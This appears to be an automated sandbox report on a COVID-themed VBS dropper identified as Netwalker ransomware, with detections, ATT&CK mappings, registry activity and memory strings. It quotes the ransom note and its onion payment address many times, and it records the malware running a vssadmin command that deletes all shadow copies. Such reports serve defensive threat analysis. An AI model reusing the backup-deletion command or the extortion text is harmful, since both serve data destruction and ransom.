Loading ...

Play interactive tourEdit tour

Analysis Report CORONAVIRUS_COVID-19.vbs

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:216773
Start date:20.03.2020
Start time:08:59:23
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 8m 7s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:CORONAVIRUS_COVID-19.vbs
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:11
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.rans.spre.evad.winVBS@6/226@0/0
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 24.9% (good quality ratio 24.3%)
  • Quality average: 83.7%
  • Quality standard deviation: 21.9%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Start process as user (medium integrity level)
  • Found application associated with file extension: .vbs
Warnings:
Show All
  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
  • Exclude process from analysis (whitelisted): dllhost.exe, MusNotifyIcon.exe, VSSVC.exe, svchost.exe, UsoClient.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Timeout during Intezer genetic analysis for unpackpe/2.1.qeSw.exe.400000.0.unpack

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Netwalker
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScheduled Task1Scheduled Task1Access Token Manipulation1Masquerading2Input Capture21Virtualization/Sandbox Evasion11Taint Shared Content1Input Capture21Data Encrypted1Standard Cryptographic Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
Replication Through Removable MediaScripting121Port MonitorsProcess Injection12Software Packing2Network SniffingProcess Discovery3Remote ServicesData from Removable MediaExfiltration Over Other Network MediumFallback ChannelsExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesExecution through API3Accessibility FeaturesScheduled Task1Disabling Security Tools1Input CaptureSecurity Software Discovery21Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic ProtocolExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseExploitation for Client Execution1System FirmwareDLL Search Order HijackingVirtualization/Sandbox Evasion11Credentials in FilesFile and Directory Discovery2Logon ScriptsInput CaptureData EncryptedMultiband CommunicationSIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessAccess Token Manipulation1Account ManipulationSystem Information Discovery23Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceProcess Injection12Brute ForceSystem Owner/User DiscoveryThird-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskScripting121Two-Factor Authentication InterceptionNetwork SniffingPass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionFile Deletion1Bash HistoryNetwork Service ScanningRemote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessObfuscated Files or Information2Input PromptSystem Network Connections DiscoveryWindows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeVirustotal: Detection: 72%Perma Link
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeReversingLabs: Detection: 70%
Multi AV Scanner detection for submitted fileShow sources
Source: CORONAVIRUS_COVID-19.vbsVirustotal: Detection: 11%Perma Link
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeJoe Sandbox ML: detected

Spreading:

barindex
Infects executable files (exe, dll, sys, html)Show sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\ReadMe.htmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.HTMJump to behavior
Creates COM task schedule object (often to register a task for autostart)Show sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_0040BFC0 FindFirstFileW,FindNextFileW,2_2_0040BFC0
Contains functionality to query local drivesShow sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeCode function: 2_2_0040D070 Sleep,SetErrorMode,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,2_2_0040D070

Networking:

barindex
Urls found in memory or binary dataShow sources
Source: qeSw.exe.0.drString found in binary or memory: http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r
Source: qeSw.exe.0.drString found in binary or memory: http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#
Source: qeSw.exe, 00000002.00000003.1385697170.0000000002774000.00000004.00000001.sdmpString found in binary or memory: http://cvs.sourceforge.jp/cgi-bin/viewcvs.cgi/ablib/ver5lib/Include/api_richedit.sbp?revision=1.2
Source: wscript.exe, 00000000.00000003.1069999339.00000145A3A08000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.1078628760.00000145A2104000.00000004.00000001.sdmpString found in binary or memory: http://google.com
Source: wscript.exe, 00000000.00000003.1069999339.00000145A3A08000.00000004.00000001.sdmpString found in binary or memory: http://google.comd
Source: qeSw.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
Source: qeSw.exe, 00000002.00000003.1157889492.0000000000861000.00000004.00000001.sdmpString found in binary or memory: http://schemas.mpv
Source: qeSw.exe, 00000002.00000003.1444918211.0000000002515000.00000004.00000001.sdmpString found in binary or memory: http://www.AutoItScript.com
Source: qeSw.exe, 00000002.00000002.1482113404.0000000002A6C000.00000004.00000001.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: qeSw.exe, 00000002.00000003.1198828942.00000000029D2000.00000004.00000001.sdmpString found in binary or memory: http://www.autoit.de/index.php?page=Thread&postID=48393
Source: qeSw.exe, 00000002.00000003.1387973473.00000000024D3000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com
Source: qeSw.exe, 00000002.00000003.1444104805.000000000285F000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/forum
Source: qeSw.exe, 00000002.00000003.1387973473.00000000024D3000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/forum/index.php?act=Search
Source: qeSw.exe, 00000002.00000003.1387973473.00000000024D3000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/forum/index.php?act=Search&CODE=01
Source: qeSw.exe, 00000002.00000002.1483430813.0000000002CEC000.00000004.00000001.sdmpString found in binary or memory: http://www.crimsoneditor.com/
Source: qeSw.exe, 00000002.00000003.1444918211.0000000002515000.00000004.00000001.sdmpString found in binary or memory: http://www.gwspikval.com/jooel/scripts/BBCodeParser/Older%20versions/2.0.1/BBCodeParser2.kix
Source: qeSw.exe.0.drString found in binary or memory: https://sectigo.com/CPS0B
Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmp, E3495D-Readme.txt12.2.drString found in binary or memory: https://torproject.org/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)Show sources
Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Installs a raw input device (often for capturing keystrokes)Show sources
Source: qeSw.exe, 00000002.00000003.1425223756.00000000027B9000.00000004.00000001.sdmpBinary or memory string: _winapi_registerhotkey _winapi_registerpowersettingnotification _winapi_registerrawinputdevices \

Spam, unwanted Advertisements and Ransom Demands:

barindex
Found ransom note / readmeShow sources
Source: C:\Program Files (x86)\AutoIt3\E3495D-Readme.txtDropped file: Hi!Your files are encrypted by Netwalker.All encrypted files for this computer has extension: .e3495d--If for some reason you read this text before the encryption ended,this can be understood by the fact that the computer slows down, and your heart rate has increased due to the ability to turn it off,then we recommend that you move away from the computer and accept that you have been compromised.Rebooting/shutdown will cause you to lose files without the possibility of recovery.--Our encryption algorithms are very strong and your files are very well protected, the only way to get your files back is to cooperate with us and get the decrypter program.Do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.For us this is just business and to prove to you our seriousness, we will decrypt you one file for free.Just open our website, upload the encrypted file and get the decrypted file for free.--Steps to get access on our website:1.Download and install tor-browser: https://torproject.org/2.Open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.Put your personal code in the input form:{code_e3495d:VGBnzZ8UgmHbW6fuVJ0M9eiLVtjCc+ApVmrkZij+mGV4kA8mQdvB9+yISdG31/J1PojgSFiJre0xJFBFimFsOS28x/G/DfVz41ZjAtHP1KT1VQeqqDojoDx1cxD4NhGtmQHS6tJN3nzNpvbJ2fekS0vRR0T1XzwvGLfd0PMU1BMt2dSMGLkySf90vdYkCXTZTVZXv3/6N1cB8IDQPjtL9ijD42Z0yO8cHh6nF0Bru2OMqB7XCgd91Q9xwN8097CRFA3nL6Fl0RKpgJ3hO5rIOPOdmHmAS/6QYw==}Jump to dropped file
Yara detected Netwalker ransomwareShow sources
Source: Yara matchFile source: Process Memory Space: qeSw.exe PID: 244, type: MEMORY
Deletes shadow drive data (may be related to ransomware)Show sources
Source: unknownProcess created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeProcess created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quietJump to behavior
Source: vssadmin.exe, 00000003.00000002.1135051160.000002BDD1945000.00000004.00000040.sdmpBinary or memory string: C:\Windows\system32\vssadmin.exedeleteshadows/all/quiet
Source: vssadmin.exe, 00000003.00000002.1134794075.000002BDD16C0000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exe, 00000003.00000002.1134794075.000002BDD16C0000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exe, 00000003.00000002.1134794075.000002BDD16C0000.00000002.00000001.sdmpBinary or memory string: vssadmin Delete Shadows
Source: vssadmin.exe, 00000003.00000002.1134794075.000002BDD16C0000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exe, 00000003.00000002.1134794075.000002BDD16C0000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
Source: vssadmin.exe, 00000003.00000002.1134855531.000002BDD1730000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\vssadmin.exeC:\Windows\system32\vssadmin.exe delete shadows /all /quietC:\Windows\system32\vssadmin.exeWinSta0\Default
Source: vssadmin.exe, 00000003.00000002.1134855531.000002BDD1730000.00000004.00000020.sdmpBinary or memory string: C:\Windows\system32\vssadmin.exe delete shadows /all /quiet
May disable shadow drive data (uses vssadmin)Show sources
Source: unknownProcess created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeProcess created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quietJump to behavior
Writes a notice file (html or txt) to demand a ransomShow sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile dropped: C:\Program Files (x86)\AutoIt3\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==}Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile dropped: C:\Program Files (x86)\Microsoft Office\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==}Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile dropped: C:\ProgramData\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==}Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile dropped: C:\Program Files\7-Zip\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==}hi!your files are encrypted by netwalker.all encrypted files for this computer has extension: .e3495d--if foJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile dropped: C:\Program Files (x86)\AutoIt3\Include\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==}hi!your files are encrypted by netwalker.all encrypted files for this computer has extension: .e3495d--if foJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile dropped: C:\Program Files (x86)\Free Window Registry Repair\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==}hi!your files are encrypted by netwalker.all encrypted files for this computer has extension: .e3495d--if foJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile dropped: C:\Program Files (x86)\AutoIt3\Examples\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==}hi!your files are encrypted by netwalker.all encrypted files for this computer has extension: .e3495d--if foJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile dropped: C:\Program Files (x86)\Adobe\Acrobat Reader DC\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==}Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile dropped: C:\Program Files (x86)\AutoIt3\Extras\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==}Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile dropped: C:\Program Files (x86)\AutoIt3\Examples\GUI\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==}Jump to dropped file
Writes many files with high entropyShow sources
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt.chm entropy: 7.99637670441Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files\7-Zip\7z.sfx entropy: 7.99565121131Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files\7-Zip\7zCon.sfx entropy: 7.99580913438Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\Include\GDIPlus.au3 entropy: 7.99334234588Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\Microsoft Office\AppXManifest.xml entropy: 7.99508004778Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\Include\GuiListView.au3 entropy: 7.99536700031Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPIGdi.au3 entropy: 7.99631912699Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\Include\ie.au3 entropy: 7.99586892518Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files\7-Zip\7-zip.chm entropy: 7.99666218983Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\Include\Date.au3 entropy: 7.99525208127Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\au3.keywords.properties entropy: 7.99546197118Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\Include\GuiTreeView.au3 entropy: 7.99524549325Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\qeSw.exeFile created: C:\Program Files (x86)\AutoIt3\Include\Array.au3 entropy: 7.99563928777Jump to dropped file
